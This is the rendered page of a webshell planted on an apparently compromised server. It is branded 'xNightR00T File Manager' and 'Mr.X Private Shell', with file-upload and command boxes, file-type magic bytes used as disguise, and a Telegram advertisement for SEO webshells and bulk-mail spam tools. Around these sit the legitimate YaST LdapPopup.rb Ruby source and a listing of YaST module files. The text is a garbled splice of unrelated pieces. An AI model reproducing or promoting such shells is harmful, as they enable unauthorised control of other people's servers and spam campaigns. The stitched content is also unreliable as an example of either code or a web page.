xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# ------------------------------------------------------------------------------
# Copyright (c) 2006-2012 Novell, Inc. All Rights Reserved.
#
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of version 2 of the GNU General Public License as published by the
# Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, contact Novell, Inc.
#
# To contact Novell about this file by physical or electronic mail, you may find
# current contact information at www.novell.com.
# ------------------------------------------------------------------------------

# File:	modules/LdapPopup.ycp
# Package:	Configuration of LDAP
# Summary:	Additional user interface functions: special edit popups
# Authors:	Jiri Suchomel <jsuchome@suse.cz>
#
# $Id$
#
# Popups for editing the values of LDAP configuration tables.
require "yast"

module Yast
  class LdapPopupClass < Module
    def main
      Yast.import "UI"
      textdomain "ldap"

      Yast.import "Ldap"
      Yast.import "Label"
      Yast.import "Popup"
      Yast.import "Wizard"
    end

    # Popup for browsing LDAP tree and selecting the DN
    # WARNING we expect that LDAP connection is already correctly initialized !
    # @param [String] root_dn the starting point (root of tree); if empty string is
    # given, the search for available bases will be done automatically
    # @return DN of selected item, empty string when canceled
    def BrowseTree(root_dn)
      # get display mode
      display_info = UI.GetDisplayInfo
      textmode = Ops.get_boolean(display_info, "TextMode", true)

      # map of already read subtrees
      dns = {}
      # selected DN (return value)
      current_dn = ""

      contents = HBox(
        VSpacing(20),
        VBox(
          HSpacing(70),
          VSpacing(0.2),
          HBox(
            HSpacing(),
            ReplacePoint(Id(:reptree), Tree(Id(:tree), root_dn, [])),
            HSpacing()
          ),
          textmode ?
            HBox(
              HSpacing(1.5),
              PushButton(Id(:ok), Opt(:key_F10), Label.OKButton),
              PushButton(Id(:cancel), Opt(:key_F9), Label.CancelButton),
              # button label
              Right(PushButton(Id(:open), Opt(:key_F6), _("&Open"))),
              HSpacing(1.5)
            ) :
            ButtonBox(
              PushButton(Id(:ok), Opt(:key_F10), Label.OKButton),
              PushButton(Id(:cancel), Opt(:key_F9), Label.CancelButton)
            ),
          VSpacing(0.2)
        )
      )

      UI.OpenDialog(Opt(:decorated), contents)

      items = []
      out = Convert.convert(
        SCR.Read(
          path(".ldap.search"),
          {
            "base_dn"      => root_dn,
            "scope"        => root_dn != "" ? 0 : 1,
            "dn_only"      => true,
            "not_found_ok" => true
          }
        ),
        :from => "any",
        :to   => "list <string>"
      )
      items = Builtins.maplist(out) do |dn|
        Ops.set(dns, dn, false)
        Item(dn, false, [])
      end if Ops.greater_than(
        Builtins.size(out),
        0
      )

      if Ops.greater_than(Builtins.size(items), 0)
        UI.ReplaceWidget(
          Id(:reptree),
          textmode ?
            Tree(Id(:tree), root_dn, items) :
            Tree(Id(:tree), Opt(:notify), root_dn, items)
        )
        # no item is selected
        UI.ChangeWidget(:tree, :CurrentItem, nil)
      elsif root_dn == ""
        bases = Convert.to_list(
          SCR.Read(
            path(".ldap.search"),
            { "base_dn" => "", "scope" => 0, "attrs" => ["namingContexts"] }
          )
        )
        if Ops.greater_than(Builtins.size(bases), 0)
          items = Builtins.maplist(
            Ops.get_list(bases, [0, "namingContexts"], [])
          ) { |dn| Item(dn, false, []) }
        end
        if Ops.greater_than(Builtins.size(items), 0)
          UI.ReplaceWidget(
            Id(:reptree),
            textmode ?
              Tree(Id(:tree), root_dn, items) :
              Tree(Id(:tree), Opt(:notify), root_dn, items)
          )
          UI.ChangeWidget(:tree, :CurrentItem, nil)
        end
      end

      UI.SetFocus(Id(:tree)) if textmode

      subdns = []
      open_items = {}

      update_items = lambda do |its|
        its = deep_copy(its)
        Builtins.maplist(its) do |it|
          dn = Ops.get_string(it, 0, "")
          next Item(dn, true, Builtins.maplist(subdns) { |k| Item(k, false, []) }) if dn == current_dn
          last = Ops.subtract(Builtins.size(it), 1)
          next deep_copy(it) if Builtins.size(Ops.get_list(it, last, [])) == 0
          # `OpenItems doesn't work in ncurses...
          open = Builtins.haskey(open_items, dn) && !textmode
          Item(dn, open, update_items.call(Ops.get_list(it, last, [])))
        end
      end

      retval = root_dn
      while true
        ret = UI.UserInput
        if ret == :tree || ret == :open
          current_dn = Convert.to_string(
            UI.QueryWidget(Id(:tree), :CurrentItem)
          )
          if !Ops.get(dns, current_dn, false)
            subdns = Convert.convert(
              SCR.Read(
                path(".ldap.search"),
                {
                  "base_dn"      => current_dn,
                  "scope"        => 1,
                  "dn_only"      => true,
                  "not_found_ok" => true
                }
              ),
              :from => "any",
              :to   => "list <string>"
            )
            Ops.set(dns, current_dn, true)
            if Ops.greater_than(Builtins.size(subdns), 0)
              open_items = Convert.to_map(UI.QueryWidget(:tree, :OpenItems))
              items = update_items.call(items)
              UI.ReplaceWidget(
                Id(:reptree),
                textmode ?
                  Tree(Id(:tree), root_dn, items) :
                  Tree(Id(:tree), Opt(:notify), root_dn, items)
              )
              UI.ChangeWidget(Id(:tree), :CurrentItem, current_dn)
              open_items = {}
            end
          end
          UI.SetFocus(Id(:tree)) if textmode
        end
        if ret == :cancel
          retval = ""
          break
        end
        if ret == :ok
          dn = Convert.to_string(UI.QueryWidget(Id(:tree), :CurrentItem))
          if dn != nil
            retval = dn
          else
            retval = current_dn
          end
          break
        end
      end
      UI.CloseDialog
      retval
    end

    # Open the LDAP Browse popup and initialize initialize LDAP connection
    # before.
    # @param [Hash] connection init map with information passed to ldap agent
    # (see ldap agent '.ldap' Execute call documentation)
    # @param [String] root_dn the starting point (root of tree); if empty string is
    # given, the search for available bases will be done automatically
    # @return DN of selected item, empty string when canceled
    def InitAndBrowseTree(root_dn, connection)
      connection = deep_copy(connection)
      args = Ops.greater_than(Builtins.size(connection), 0) ?
        connection :
        {
          "hostname"   => Ldap.GetFirstServer(Ldap.server),
          "port"       => Ldap.GetFirstPort(Ldap.server),
          "use_tls"    => Ldap.ldap_tls ? "yes" : "no",
          "cacertdir"  => Ldap.tls_cacertdir,
          "cacertfile" => Ldap.tls_cacertfile
        }
      error = Ldap.LDAPInitWithTLSCheck(args)
      if error != ""
        Ldap.LDAPErrorMessage("init", error)
        return root_dn
      end
      BrowseTree(root_dn)
    end


    # Generic popup for editing attribute's value
    # @param map with settings, it could have these keys:
    #  "attr"	attribute name
    #  "value"	current attribute values
    #  "conflicts" list of forbidden values (e.g. existing 'cn' values)
    #  "single"	if attribute can have only one value
    #  "offer"	list of possible values for current attribute (e.g. existing
    #		groups for "secondaryGroup" attribute)
    #  "browse"	if Browse LDAP Tree widget should be provided for choosing DN
    # @return [Array] of atrtibute values (edited or unchanged)
    def EditAttribute(settings)
      settings = deep_copy(settings)
      attr = Ops.get_string(settings, "attr", "")
      value = Ops.get_list(settings, "value", [])
      conflicts = Ops.get_list(settings, "conflicts", [])
      offer = Ops.get_list(settings, "offer", [])
      single = Ops.get_boolean(settings, "single", false)
      browse = Ops.get_boolean(settings, "browse", false)

      # help text 1/3
      help_text = _("<p>Set the new value for the current attribute.</p>") +
        # help text 2/3
        _(
          "<p>If the attribute can have more values, add new entries\n" +
            "with <b>Add Value</b>. Sometimes the button contains the list of\n" +
            "possible values to use for the current attribute.\n" +
            "If the value of the edited attribute should be a distinguished name (DN),\n" +
            "it is possible to choose it from the LDAP tree using <b>Browse</b>.\n" +
            "</p>\n"
        )

      desc = Ldap.AttributeDescription(attr)

      if desc != ""
        # help text 3/3, %1 is attribute name, description follows.
        # The description will be not translated: maybe add a note
        # "available only in english" to the sentence for other languages?
        # Example:
        # "<p>The description of attribute \"%1\"<br>(available only in english):</p>"
        # or:
        # "<p>The description (only in english) of attribute \"%1\":<br></p>"
        help_text = Ops.add(
          Ops.add(
            help_text,
            Builtins.sformat(
              _("<p>The description of attribute \"%1\":<br></p>"),
              attr
            )
          ),
          Builtins.sformat("<p><i>%1</i></p>", desc)
        )
      end

      org_value = deep_copy(value)
      value_size = Builtins.size(value)

      # horizontal size of popup for
      hsize = Ops.add(Builtins.size(Ops.get(value, 0, "")), 10)

      # Helper for creating items for EditAttribute Popup
      generate_value_list = lambda do
        ret = VBox()
        if single
          ret = Builtins.add(
            ret,
            InputField(
              Id(0),
              Opt(:hstretch),
              # textentry label
              Builtins.sformat(_("&Value of \"%1\" Attribute"), attr),
              Ops.get(value, 0, "")
            )
          )
        else
          ret = Builtins.add(
            ret,
            InputField(
              Id(0),
              Opt(:hstretch),
              # textentry label
              Builtins.sformat(_("&Values of \"%1\" Attribute"), attr),
              Ops.get(value, 0, "")
            )
          )
          i = 1
          while Ops.less_than(i, value_size)
            ret = Builtins.add(
              ret,
              InputField(Id(i), Opt(:hstretch), "", Ops.get(value, i, ""))
            )
            if Ops.greater_than(
                Builtins.size(Ops.add(Ops.get(value, i, ""), 10)),
                hsize
              )
              hsize = Ops.add(Builtins.size(Ops.get(value, i, "")), 10)
            end
            i = Ops.add(i, 1)
          end
        end
        deep_copy(ret)
      end

      values = generate_value_list.call
      # button label
      add_button = PushButton(Id(:new), Opt(:key_F3), _("&Add Value"))

      if Ops.greater_than(Builtins.size(offer), 0) || browse
        # menubutton item (default value)
        mb = [Item(Id(:new), _("&Empty Entry"))]
        mb = Builtins.add(mb, Item(Id(:browse), _("Bro&wse"))) if browse
        Builtins.foreach(
          Convert.convert(offer, :from => "list", :to => "list <string>")
        ) { |it| mb = Builtins.add(mb, Item(Id(it), it)) }
        # button label
        add_button = MenuButton(Id(:mb), Opt(:key_F3), _("&Add Value"), mb)
      end

      UI.OpenDialog(
        Opt(:decorated),
        HBox(
          HSpacing(1),
          VBox(
            HSpacing(Ops.greater_than(hsize, 50) ? hsize : 50),
            ReplacePoint(Id(:rp), values),
            single ?
              ButtonBox(
                PushButton(Id(:ok), Opt(:default, :key_F10), Label.OKButton),
                PushButton(Id(:cancel), Opt(:key_F9), Label.CancelButton),
                PushButton(Id(:help), Opt(:key_F2), Label.HelpButton)
              ) :
              HBox(
                add_button,
                ButtonBox(
                  PushButton(Id(:ok), Opt(:default, :key_F10), Label.OKButton),
                  PushButton(Id(:cancel), Opt(:key_F9), Label.CancelButton),
                  PushButton(Id(:help), Opt(:key_F2), Label.HelpButton)
                )
              )
          ),
          HSpacing(1)
        )
      )
      result = nil
      new_value = []

      value_size = 1 if value_size == 0
      UI.SetFocus(Id(Ops.subtract(value_size, 1)))
      while true
        result = UI.UserInput
        if result == :cancel
          new_value = deep_copy(org_value)
          break
        end
        Wizard.ShowHelp(help_text) if result == :help
        if result == :new || Builtins.contains(offer, result) ||
            result == :browse
          j = 0
          value = []
          while Ops.less_than(j, value_size)
            value = Builtins.add(
              value,
              Convert.to_string(UI.QueryWidget(Id(j), :Value))
            )
            j = Ops.add(j, 1)
          end
          if Builtins.contains(offer, result) &&
              Ops.get(value, Ops.subtract(value_size, 1), "") == ""
            # relace last empty entry
            Ops.set(
              value,
              Ops.subtract(value_size, 1),
              Convert.to_string(result)
            )
          elsif result == :browse
            Ops.set(value, Ops.subtract(value_size, 1), BrowseTree(""))
          else
            # add new entry
            value = Builtins.add(
              value,
              result == :new ? "" : Convert.to_string(result)
            )
            value_size = Ops.add(value_size, 1)
          end
          UI.ReplaceWidget(Id(:rp), generate_value_list.call)
          UI.SetFocus(Id(Ops.subtract(value_size, 1)))
        end
        if result == :ok
          j = 0
          duplicate = false
          new_value = []
          while Ops.less_than(j, value_size) && !duplicate
            v = Convert.to_string(UI.QueryWidget(Id(j), :Value))
            if !Builtins.contains(org_value, v) &&
                Builtins.contains(conflicts, v)
              #error popup
              Popup.Error(
                Builtins.sformat(
                  _(
                    "The value '%1' already exists.\nPlease select another one."
                  ),
                  v
                )
              )
              duplicate = true
            end
            new_value = Builtins.add(new_value, v) if v != ""
            j = Ops.add(j, 1)
          end
          next if duplicate
          break
        end
      end
      UI.CloseDialog
      deep_copy(new_value)
    end

    # Popup for adding new configuration module
    # @param [Array] conflicts list of forbidden names ('cn' values)
    # @param [Array] available list of possible object classes for new module
    # @return [Hash] of new module (contains its name and object class)
    def NewModule(available, conflicts)
      available = deep_copy(available)
      conflicts = deep_copy(conflicts)
      descriptions = {
        # description of configuration object
        "suseuserconfiguration"  => _(
          "Configuration of user management tools"
        ),
        # description of configuration object
        "susegroupconfiguration" => _(
          "Configuration of group management tools"
        )
      }
      # label
      r_buttons = VBox(Left(Label(_("Object Class of New Module"))))
      Builtins.foreach(
        Convert.convert(available, :from => "list", :to => "list <string>")
      ) do |class2|
        desc = class2
        if Ops.get_string(descriptions, class2, "") != ""
          desc = Builtins.sformat(
            "%1 (%2)",
            class2,
            Ops.get_string(descriptions, class2, "")
          )
        end
        r_buttons = Builtins.add(
          r_buttons,
          Left(RadioButton(Id(class2), desc, true))
        )
      end
      UI.OpenDialog(
        Opt(:decorated),
        HBox(
          HSpacing(1),
          VBox(
            HSpacing(50),
            RadioButtonGroup(Id(:rb), r_buttons),
            InputField(
              Id(:cn),
              Opt(:hstretch),
              # textentry label, do not translate "cn"
              _("&Name of New Module (\"cn\" Value)")
            ),
            ButtonBox(
              PushButton(Id(:ok), Opt(:default, :key_F10), Label.OKButton),
              PushButton(Id(:cancel), Opt(:key_F9), Label.CancelButton)
            )
          ),
          HSpacing(1)
        )
      )
      result = nil
      new_value = ""
      _class = ""

      UI.SetFocus(Id(:cn))
      while true
        result = UI.UserInput
        if result == :cancel
          new_value = ""
          break
        end
        if result == :ok
          new_value = Convert.to_string(UI.QueryWidget(Id(:cn), :Value))
          if Builtins.contains(conflicts, new_value)
            #error popup
            Popup.Error(
              _("The entered value already exists.\nSelect another one.\n")
            )
            next
          end
          if new_value == ""
            #error popup
            Popup.Error(_("Enter the module name."))
            next
          end
          _class = Convert.to_string(UI.QueryWidget(Id(:rb), :CurrentButton))
          break
        end
      end
      UI.CloseDialog
      { "class" => _class, "cn" => new_value }
    end

    # Popup for adding new default value (default value is template's attribute)
    # @param [Array] conflicts list of attributes already set
    # @param [Array] available list of possible attributes
    # @return [Hash] of new "default value" (contains attribute name and value)
    def AddDefaultValue(available, conflicts)
      available = deep_copy(available)
      conflicts = deep_copy(conflicts)
      # help text 1/3
      help_text = _(
        "<p>Here, set the values of attributes belonging\n" +
          "to an object using the current template. Such values are used as defaults when\n" +
          "the new object is created.</p>\n"
      ) +
        # // help text 2/3 do not translate "defaultObjectClass"
        # _("<p>The list of attributes provided in <b>Attribute Name</b> is the
        # list of allowed attributes for objects described in the \"defaultObjectClass\"
        # entry of the current template.</p>
        # ") +

        # help text 3/3 do not translate "homedirectory"
        _(
          "<p>You can use special syntax to create attribute\n" +
            "values from existing ones. The expression <i>%attr_name</i> will be replaced\n" +
            "with the value of attribute \"attr_name\" (for example, use \"/home/%uid\"\n" +
            "as a value of \"homeDirectory\").</p>\n"
        )

      available = Builtins.filter(
        Convert.convert(available, :from => "list", :to => "list <string>")
      ) { |attr2| !Builtins.contains(conflicts, attr2) }

      UI.OpenDialog(
        Opt(:decorated),
        HBox(
          HSpacing(1),
          VBox(
            HSpacing(50),
            VSpacing(0.5),
            # combobox label
            Left(
              ComboBox(
                Id(:attr),
                Opt(:editable),
                _("Attribute &Name"),
                available
              )
            ),
            VSpacing(0.5),
            # textentry label
            InputField(Id(:val), Opt(:hstretch), _("Attribute &Value")),
            VSpacing(0.5),
            ButtonBox(
              PushButton(Id(:ok), Opt(:default, :key_F10), Label.OKButton),
              PushButton(Id(:cancel), Opt(:key_F9), Label.CancelButton),
              PushButton(Id(:help), Opt(:key_F2), Label.HelpButton)
            ),
            VSpacing(0.5)
          ),
          HSpacing(1)
        )
      )
      result = nil
      new_value = ""
      attr = ""

      UI.SetFocus(Id(:attr))
      while true
        result = UI.UserInput
        if result == :cancel
          new_value = ""
          break
        end
        Wizard.ShowHelp(help_text) if result == :help
        if result == :ok
          attr = Convert.to_string(UI.QueryWidget(Id(:attr), :Value))
          new_value = Convert.to_string(UI.QueryWidget(Id(:val), :Value))
          break
        end
      end
      UI.CloseDialog
      { "attr" => attr, "value" => new_value }
    end

    publish :function => :BrowseTree, :type => "string (string)"
    publish :function => :InitAndBrowseTree, :type => "string (string, map)"
    publish :function => :EditAttribute, :type => "list <string> (map)"
    publish :function => :NewModule, :type => "map (list, list)"
    publish :function => :AddDefaultValue, :type => "map (list, list)"
  end

  LdapPopup = LdapPopupClass.new
  LdapPopup.main
end

Filemanager

Name Type Size Permission Actions
YaPI Folder 0755
YaST Folder 0755
ALog.rb File 3.26 KB 0644
AddOnProduct.rb File 78.59 KB 0644
Address.rb File 3.45 KB 0644
Arch.rb File 15.59 KB 0644
AsciiFile.rb File 12.59 KB 0644
Assert.rb File 2.06 KB 0644
AuditLaf.rb File 21.16 KB 0644
AuthServer.pm File 172.86 KB 0644
AutoInstall.rb File 11.34 KB 0644
AutoInstallRules.rb File 36.37 KB 0644
AutoinstClass.rb File 7.62 KB 0644
AutoinstClone.rb File 6.82 KB 0644
AutoinstCommon.rb File 3.18 KB 0644
AutoinstConfig.rb File 17.86 KB 0644
AutoinstData.rb File 2.37 KB 0644
AutoinstDrive.rb File 14.28 KB 0644
AutoinstFile.rb File 9.3 KB 0644
AutoinstFunctions.rb File 1.1 KB 0644
AutoinstGeneral.rb File 17.48 KB 0644
AutoinstImage.rb File 1.75 KB 0644
AutoinstLVM.rb File 21.58 KB 0644
AutoinstPartPlan.rb File 36.37 KB 0644
AutoinstPartition.rb File 14.53 KB 0644
AutoinstRAID.rb File 7.73 KB 0644
AutoinstScripts.rb File 36.75 KB 0644
AutoinstSoftware.rb File 38.57 KB 0644
AutoinstStorage.rb File 48.62 KB 0644
Autologin.rb File 4.82 KB 0644
BootArch.rb File 3.37 KB 0644
BootStorage.rb File 10.15 KB 0644
BootSupportCheck.rb File 7.36 KB 0644
Bootloader.rb File 15.87 KB 0644
CWM.rb File 39.16 KB 0644
CWMFirewallInterfaces.rb File 38.92 KB 0644
CWMServiceStart.rb File 27.49 KB 0644
CWMTab.rb File 13.2 KB 0644
CWMTable.rb File 14.57 KB 0644
CWMTsigKeys.rb File 24.93 KB 0644
CaMgm.rb File 12.9 KB 0644
Call.rb File 1.53 KB 0644
CheckMedia.rb File 6.1 KB 0644
CommandLine.rb File 52.89 KB 0644
Confirm.rb File 6.95 KB 0644
Console.rb File 8.63 KB 0644
ContextMenu.rb File 1.4 KB 0644
Crash.rb File 5.26 KB 0644
Cron.rb File 2.85 KB 0644
CustomDialogs.rb File 2.52 KB 0644
DNS.rb File 23.77 KB 0644
DebugHooks.rb File 4.89 KB 0644
DefaultDesktop.rb File 13.29 KB 0644
Desktop.rb File 12.5 KB 0644
DevicesSelectionBox.rb File 5.67 KB 0644
DhcpServer.pm File 70.43 KB 0644
DhcpServerUI.rb File 10.43 KB 0644
DialogTree.rb File 11.76 KB 0644
Directory.rb File 4.99 KB 0644
Distro.rb File 2.29 KB 0644
DnsData.pm File 1.65 KB 0644
DnsFakeTabs.rb File 751 B 0644
DnsRoutines.pm File 2.81 KB 0644
DnsServer.pm File 57.26 KB 0644
DnsServerAPI.pm File 68.81 KB 0644
DnsServerHelperFunctions.rb File 11.83 KB 0644
DnsServerUI.rb File 3.78 KB 0644
DnsTsigKeys.pm File 2.53 KB 0644
DnsZones.pm File 22.9 KB 0644
DontShowAgain.rb File 13.03 KB 0644
DualMultiSelectionBox.rb File 24.91 KB 0644
Encoding.rb File 4.54 KB 0644
Event.rb File 4.89 KB 0644
FTP.rb File 2.32 KB 0644
FileChanges.rb File 9.39 KB 0644
FileSystems.rb File 69.86 KB 0644
FileUtils.rb File 17.64 KB 0644
FtpServer.rb File 36.4 KB 0644
GPG.rb File 13.58 KB 0644
GPGWidgets.rb File 12.34 KB 0644
GetInstArgs.rb File 4.04 KB 0644
Greasemonkey.rb File 6.86 KB 0644
HTML.rb File 6.11 KB 0644
HTTP.rb File 3.37 KB 0644
HWConfig.rb File 5.1 KB 0644
Hooks.rb File 5.76 KB 0644
Host.rb File 10.78 KB 0644
Hostname.rb File 7.35 KB 0644
Hotplug.rb File 5.64 KB 0644
HttpServer.rb File 26.81 KB 0644
HttpServerWidgets.rb File 120.87 KB 0644
HwStatus.rb File 3.08 KB 0644
IP.rb File 12.65 KB 0644
IPSecConf.rb File 22.58 KB 0644
Icon.rb File 5.43 KB 0644
ImageInstallation.rb File 49.56 KB 0644
Inetd.rb File 28.29 KB 0644
Initrd.rb File 16.41 KB 0644
InstData.rb File 4.13 KB 0644
InstError.rb File 6.95 KB 0644
InstExtensionImage.rb File 15.48 KB 0644
InstFunctions.rb File 5.12 KB 0644
InstShowInfo.rb File 2.81 KB 0644
InstURL.rb File 6.06 KB 0644
Installation.rb File 10.29 KB 0644
Instserver.rb File 43.86 KB 0644
Integer.rb File 2.99 KB 0644
Internet.rb File 9.29 KB 0644
IscsiClient.rb File 9.74 KB 0644
IscsiClientLib.rb File 55.9 KB 0644
IsnsServer.rb File 11.07 KB 0644
Kdump.rb File 38.8 KB 0644
Kerberos.rb File 37.03 KB 0644
Kernel.rb File 22.96 KB 0644
KeyManager.rb File 8.47 KB 0644
Keyboard.rb File 50.48 KB 0644
Kickstart.rb File 23.84 KB 0644
Label.rb File 9.11 KB 0644
Lan.rb File 32.38 KB 0644
LanItems.rb File 94.36 KB 0644
Language.rb File 45.33 KB 0644
Ldap.rb File 63.96 KB 0644
LdapDatabase.rb File 77.2 KB 0644
LdapPopup.rb File 21.03 KB 0644
LdapServerAccess.pm File 8.73 KB 0644
Linuxrc.rb File 7.53 KB 0644
LogView.rb File 21.39 KB 0644
LogViewCore.rb File 6.32 KB 0644
Mail.rb File 43.92 KB 0644
MailAliases.rb File 6.88 KB 0644
MailTable.pm File 3.25 KB 0644
MailTableInclude.pm File 4.79 KB 0644
Map.rb File 4.27 KB 0644
Message.rb File 11.39 KB 0644
MiniWorkflow.rb File 2.88 KB 0644
Misc.rb File 11.8 KB 0644
Mode.rb File 10.76 KB 0644
ModuleLoading.rb File 9.26 KB 0644
ModulesConf.rb File 4.24 KB 0644
Mtab.rb File 1.24 KB 0644
NetHwDetection.rb File 8.46 KB 0644
Netmask.rb File 5.08 KB 0644
Network.rb File 1.3 KB 0644
NetworkConfig.rb File 5.9 KB 0644
NetworkInterfaces.rb File 56.49 KB 0644
NetworkPopup.rb File 7.86 KB 0644
NetworkService.rb File 12.71 KB 0644
NetworkStorage.rb File 1.91 KB 0644
Nfs.rb File 22.35 KB 0644
NfsOptions.rb File 5.63 KB 0644
NfsServer.rb File 10.64 KB 0644
Nis.rb File 42.75 KB 0644
NisServer.rb File 39.93 KB 0644
Nsswitch.rb File 3.6 KB 0644
NtpClient.rb File 46.6 KB 0644
OSRelease.rb File 3.68 KB 0644
OneClickInstall.rb File 28.86 KB 0644
OneClickInstallStandard.rb File 4.35 KB 0644
OneClickInstallWidgets.rb File 16.54 KB 0644
OneClickInstallWorkerFunctions.rb File 10.6 KB 0644
OneClickInstallWorkerResponse.rb File 5.63 KB 0644
OnlineUpdate.rb File 4.04 KB 0644
OnlineUpdateCallbacks.rb File 19.62 KB 0644
OnlineUpdateDialogs.rb File 16.85 KB 0644
Package.rb File 7.78 KB 0644
PackageAI.rb File 5.03 KB 0644
PackageCallbacks.rb File 87.95 KB 0644
PackageCallbacksInit.rb File 2.12 KB 0644
PackageInstallation.rb File 8.49 KB 0644
PackageKit.rb File 2.67 KB 0644
PackageLock.rb File 6.77 KB 0644
PackageSlideShow.rb File 42.52 KB 0644
PackageSystem.rb File 16.87 KB 0644
Packages.rb File 94.3 KB 0644
PackagesProposal.rb File 11.79 KB 0644
PackagesUI.rb File 24.29 KB 0644
Pam.rb File 3.73 KB 0644
Partitions.rb File 33.23 KB 0644
Popup.rb File 57.78 KB 0644
PortAliases.rb File 10.47 KB 0644
PortRanges.rb File 22.92 KB 0644
Printer.rb File 112.82 KB 0644
Printerlib.rb File 31.82 KB 0644
Product.rb File 8.9 KB 0644
ProductControl.rb File 52.95 KB 0644
ProductFeatures.rb File 12.23 KB 0644
ProductLicense.rb File 50.23 KB 0644
ProductProfile.rb File 8.01 KB 0644
Profile.rb File 29.95 KB 0644
ProfileLocation.rb File 9.45 KB 0644
Progress.rb File 28.17 KB 0644
Proxy.rb File 15.65 KB 0644
Punycode.rb File 11.81 KB 0644
Region.rb File 1.82 KB 0644
RelocationServer.rb File 14.65 KB 0644
Remote.rb File 10.42 KB 0644
Report.rb File 25.13 KB 0644
RichText.rb File 4.01 KB 0644
RootPart.rb File 71.9 KB 0644
Routing.rb File 17.25 KB 0644
SLP.rb File 7.06 KB 0644
SLPAPI.pm File 879 B 0644
SSHAuthorizedKeys.rb File 3.74 KB 0644
SUSERelease.rb File 2.82 KB 0644
Samba.rb File 38.14 KB 0644
SambaAD.pm File 12.46 KB 0644
SambaConfig.pm File 37.4 KB 0644
SambaNetJoin.pm File 13.14 KB 0644
SambaNmbLookup.pm File 6.58 KB 0644
SambaWinbind.pm File 5.33 KB 0644
Security.rb File 27.79 KB 0644
Sequencer.rb File 12.6 KB 0644
Service.rb File 15.66 KB 0644
ServicesProposal.rb File 2.37 KB 0644
SignatureCheckCallbacks.rb File 11.1 KB 0644
SignatureCheckDialogs.rb File 36.74 KB 0644
SlideShow.rb File 33.27 KB 0644
SlideShowCallbacks.rb File 21.04 KB 0644
Slides.rb File 7.56 KB 0644
SlpService.rb File 5.37 KB 0644
Snapper.rb File 16.93 KB 0644
SnapperDbus.rb File 6.73 KB 0644
SourceDialogs.rb File 83.88 KB 0644
SourceManager.rb File 25.54 KB 0644
SourceManagerSLP.rb File 18.66 KB 0644
SpaceCalculation.rb File 35.03 KB 0644
Squid.rb File 51.25 KB 0644
SquidACL.rb File 16.84 KB 0644
SquidErrorMessages.rb File 5.59 KB 0644
Stage.rb File 3.6 KB 0644
Storage.rb File 234.29 KB 0644
StorageClients.rb File 6.68 KB 0644
StorageControllers.rb File 13.47 KB 0644
StorageDevices.rb File 19.86 KB 0644
StorageFields.rb File 45.67 KB 0644
StorageIcons.rb File 3.18 KB 0644
StorageInit.rb File 3.62 KB 0644
StorageProposal.rb File 222.63 KB 0644
StorageSettings.rb File 6.33 KB 0644
StorageSnapper.rb File 3.96 KB 0644
StorageUpdate.rb File 24.13 KB 0644
String.rb File 30.46 KB 0644
SuSEFirewall.rb File 1.29 KB 0644
SuSEFirewall4Network.rb File 12.24 KB 0644
SuSEFirewallCMDLine.rb File 53.73 KB 0644
SuSEFirewallExpertRules.rb File 13.11 KB 0644
SuSEFirewallProposal.rb File 25.99 KB 0644
SuSEFirewallServices.rb File 2.87 KB 0644
SuSEFirewallUI.rb File 2 KB 0644
Sudo.rb File 18.06 KB 0644
Summary.rb File 6.22 KB 0644
Support.rb File 14.83 KB 0644
Sysconfig.rb File 39.21 KB 0644
SystemFilesCopy.rb File 16.27 KB 0644
Systemd.rb File 4.88 KB 0644
TFTP.rb File 2.08 KB 0644
TabPanel.rb File 4.36 KB 0644
TablePopup.rb File 34.41 KB 0644
TftpServer.rb File 10.72 KB 0644
Timezone.rb File 35.64 KB 0644
TreePanel.rb File 5.24 KB 0644
TypeRepository.rb File 5.03 KB 0644
UIHelper.rb File 5.56 KB 0644
URL.rb File 22.61 KB 0644
URLRecode.rb File 1.88 KB 0644
Update.rb File 33.73 KB 0644
UserSettings.rb File 3.41 KB 0644
Users.pm File 193.07 KB 0644
UsersCache.pm File 32.48 KB 0644
UsersLDAP.pm File 51.51 KB 0644
UsersPasswd.pm File 24.75 KB 0644
UsersPluginKerberos.pm File 7.22 KB 0644
UsersPluginLDAPAll.pm File 12.98 KB 0644
UsersPluginLDAPPasswordPolicy.pm File 10.49 KB 0644
UsersPluginLDAPShadowAccount.pm File 11.49 KB 0644
UsersPluginQuota.pm File 12.5 KB 0644
UsersPlugins.pm File 4.73 KB 0644
UsersRoutines.pm File 20.04 KB 0644
UsersSimple.pm File 26.37 KB 0644
UsersUI.rb File 19.49 KB 0644
ValueBrowser.rb File 6.97 KB 0644
Vendor.rb File 6.1 KB 0644
VirtConfig.rb File 22.91 KB 0644
WOL.rb File 4.66 KB 0644
Wizard.rb File 53.13 KB 0644
WizardHW.rb File 18.16 KB 0644
WorkflowManager.rb File 53.17 KB 0644
XML.rb File 6.33 KB 0644
XVersion.rb File 3.7 KB 0644
Y2ModuleConfig.rb File 13.11 KB 0644
YPX.pm File 1.1 KB 0644
YaPI.pm File 5.3 KB 0644
services_manager.rb File 2.41 KB 0644
services_manager_service.rb File 18.04 KB 0644
services_manager_target.rb File 5.04 KB 0644
systemd_service.rb File 6.67 KB 0644
systemd_socket.rb File 3.61 KB 0644
systemd_target.rb File 3.53 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1